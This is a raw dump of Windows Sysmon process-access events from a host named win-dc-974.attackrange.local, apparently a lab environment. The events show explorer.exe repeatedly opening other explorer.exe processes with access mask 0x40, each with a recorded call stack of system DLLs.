16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241422Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241421Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241420Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241419Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241418Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241417Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241416Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241415Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241414Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241413Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241412Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241411Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241410Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241409Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241408Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241407Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241406Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241405Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241404Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241403Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241402Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241401Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241400Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241399Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241398Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241397Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241396Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241395Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 